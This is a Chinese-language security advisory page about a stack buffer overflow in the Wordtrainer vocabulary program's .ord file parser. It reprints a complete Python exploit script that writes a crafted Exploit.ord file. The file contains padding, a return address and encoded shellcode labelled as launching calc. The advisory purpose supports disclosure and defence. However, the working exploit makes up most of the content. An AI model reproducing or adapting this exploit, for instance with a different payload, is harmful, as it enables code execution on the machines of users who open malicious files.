当前位置: 首页 > 服务与支持 > 产品升级公告 > 安全漏洞公告

服务与支持Support

Wordtrainer \'.ord\'文件缓冲区溢出漏洞

信息来源:C4SS!0 G0M3S      发表日期:2013-04-01 15:45:00

Wordtrainer是一款单词学习软件。

Wordtrainer 3.0在解析Glosexpert (*.ord)文件时存在边界错误,可导致栈缓冲区溢出。

 

BUGTRAQ-ID:47326

受影响系统:

Wordtrainer Wordtrainer 3.07

 

 

测试方法:

警  告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python

#

#[+]Exploit Title: Wordtrainer V3.0 .ORD File Buffer Overflow Vulnerability

#[+]Date: 12\\04\\2011

#[+]Author: C4SS!0 G0M3S

#[+]Software Link: http://www.wordtrainer.net/software/files/wt307shw_exe/wt307shw.exe

#[+]Version: 3.0

#[+]Tested On: WIN-XP SP3 Brazilian Portuguese

#[+]CVE: N/A

#

#

 

 

from struct import pack

from time import sleep

 

print """

        Exploit Buffer Overflow Wordtrainer 3.0

        Created BY C4SS!0 G0M3S

        E-mail Louredo_@hotmail.com

        Site www.exploit-br.org

 

"""

buf = ("\\x41" * 868)

buf += pack(\'<L\',0x00430363)

buf += ("\\x90" * 10)

buf += ("\\xdb\\xc0\\x31\\xc9\\xbf\\x7c\\x16\\x70\\xcc\\xd9\\x74\\x24\\xf4\\xb1"

"\\x1e\\x58\\x31\\x78\\x18\\x83\\xe8\\xfc\\x03\\x78\\x68\\xf4\\x85\\x30"

"\\x78\\xbc\\x65\\xc9\\x78\\xb6\\x23\\xf5\\xf3\\xb4\\xae\\x7d\\x02\\xaa"

"\\x3a\\x32\\x1c\\xbf\\x62\\xed\\x1d\\x54\\xd5\\x66\\x29\\x21\\xe7\\x96"

"\\x60\\xf5\\x71\\xca\\x06\\x35\\xf5\\x14\\xc7\\x7c\\xfb\\x1b\\x05\\x6b"

"\\xf0\\x27\\xdd\\x48\\xfd\\x22\\x38\\x1b\\xa2\\xe8\\xc3\\xf7\\x3b\\x7a" #Shellcode WinExec("calc",0)

"\\xcf\\x4c\\x4f\\x23\\xd3\\x53\\xa4\\x57\\xf7\\xd8\\x3b\\x83\\x8e\\x83"

"\\x1f\\x57\\x53\\x64\\x51\\xa1\\x33\\xcd\\xf5\\xc6\\xf5\\xc1\\x7e\\x98"

"\\xf5\\xaa\\xf1\\x05\\xa8\\x26\\x99\\x3d\\x3b\\xc0\\xd9\\xfe\\x51\\x61"

"\\xb6\\x0e\\x2f\\x85\\x19\\x87\\xb7\\x78\\x2f\\x59\\x90\\x7b\\xd7\\x05"

"\\x7f\\xe8\\x7b\\xca")

buf += "\\x41" * (2000-len(buf))

head = ("\\x47\\x4C\\x4F\\x53\\x4F\\x52\\x0D\\x0A\\x31\\x0D\\x0A\\x0D\\x0A\\x20\\x0D\\x0A")

 

head += (buf+"\\r\\n")

 

print "[+]Creating the Exploit File..."

sleep(1)

FILE = open("Exploit.ord","wb")

FILE.write(head)

FILE.close()

print "[+]File Created With Success\\n"

sleep(2)

解决办法:

厂商补丁:

Wordtrainer

-----------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.wordtrainer.net/software/?lang=en&page=download

 

参考信息:

http://osvdb.org/show/osvdb/74985

http://secunia.com/advisories/44101/